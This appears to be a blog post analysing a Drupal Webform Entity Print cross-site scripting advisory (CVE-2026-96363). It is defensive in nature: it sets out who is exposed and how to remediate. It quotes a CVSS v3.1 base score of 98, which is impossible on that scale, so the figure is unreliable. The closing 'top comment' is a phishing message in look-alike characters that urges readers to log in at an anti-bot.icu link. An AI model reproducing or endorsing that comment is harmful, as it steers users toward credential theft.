Why CVE-2026-96363 Is the Submodule Problem, Not a Drupal Core Problem
The distinction that matters
Drupal security advisory SA-CONTRIB-2026-161, published 23 September 2026, covers CVE-2026-96363 and the affected project is Webform, a contributed module. The affected code path is Webform Entity Print, a submodule that ships inside the Webform project. Drupal core is not named as affected.
That distinction is practical. Core vulnerabilities trigger site-wide emergency processes. Contributed module issues live in a different operational compartment, where a site may or may not have installed the project at all, and where the submodule may or may not be enabled.
How the submodule is different again
Webform Entity Print is one step further down. It is bundled with Webform but disabled by default, which means a site can run an affected Webform version for months without ever exposing the code path the advisory describes.
The advisory is specific about the consequence of that packaging. The submodule does not sufficiently limit access to its print templates, and a user holding create webform and edit own webform can exploit cross-site scripting through the submodule settings. Both the submodule and the permission pair are required.
What an accurate risk statement looks like
A statement that says Drupal is vulnerable to CVE-2026-96363 overstates the case. A statement that says Drupal sites running Webform Entity Print on an affected Webform branch, with a role granting both authoring permissions, are exposed is accurate and actionable.
The difference changes who gets woken up at night. Under the first framing, every Drupal owner in an organisation is in scope. Under the second, the population is sites that installed Webform, enabled the submodule, and granted the permissions.
Why coordinated releases blur this
WID-SEC-2026-3554 collects 36 CVE identifiers across 16 contributed projects in one high-risk notice, with a batch-level CVSS v3.1 base score of 98 and temporal score of 85. Those figures describe a roll-up. Within the same release, Drupal advisories classify individual identifiers as cross-site scripting, access bypass, denial of service, cross-site request forgery and remote code execution.
SA-CONTRIB-2026-161 classifies this one as cross-site scripting, moderately critical, 10 out of 25. Reading the classification from the project notice and the breadth from the batch notice is the accurate combination.
Exposure context
A ZoomEye query for app="Drupal" returned 436397 matching assets on 27 September 2026, and a query for vul.cve="CVE-2026-96363" returned zero. The large number counts Drupal assets visible in the index and cannot separate sites that enabled the submodule from those that did not. The zero is an index result at a point in time, not a clean bill of health.
Remediation
Update Webform to 6.2.12 on the 6.2.x branch or 6.3.1 on the 6.3.x branch. If Webform Entity Print is not needed, disabling it removes the affected code path whether or not the update has been applied yet. Review which roles hold create webform and edit own webform, and confirm the installed version after updating rather than trusting the update queue.
References
- Drupal security advisory SA-CONTRIB-2026-161, Webform, cross-site scripting, affected versions <6.2.12 and >=6.3.0 <6.3.1
- CERT-BUND advisory WID-SEC-2026-3554, Drupal extensions, multiple vulnerabilities, high risk
- ZoomEye search app="Drupal", 27 September 2026, exact count 436397
- ZoomEye search vul.cve="CVE-2026-96363", 27 September 2026, exact count 0
Top comments (1)
Dеar User,
Due to аn іncreаse in bоt activitу оn the рlаtform, wе rеquіrе verify оf yоur account.
Рleаsе log in via the link bеlоw:
• anti-bot.icu/5K0N5G7M9C4
Verificated deаdline - 12 hours.
Sincerely,Dev Supрort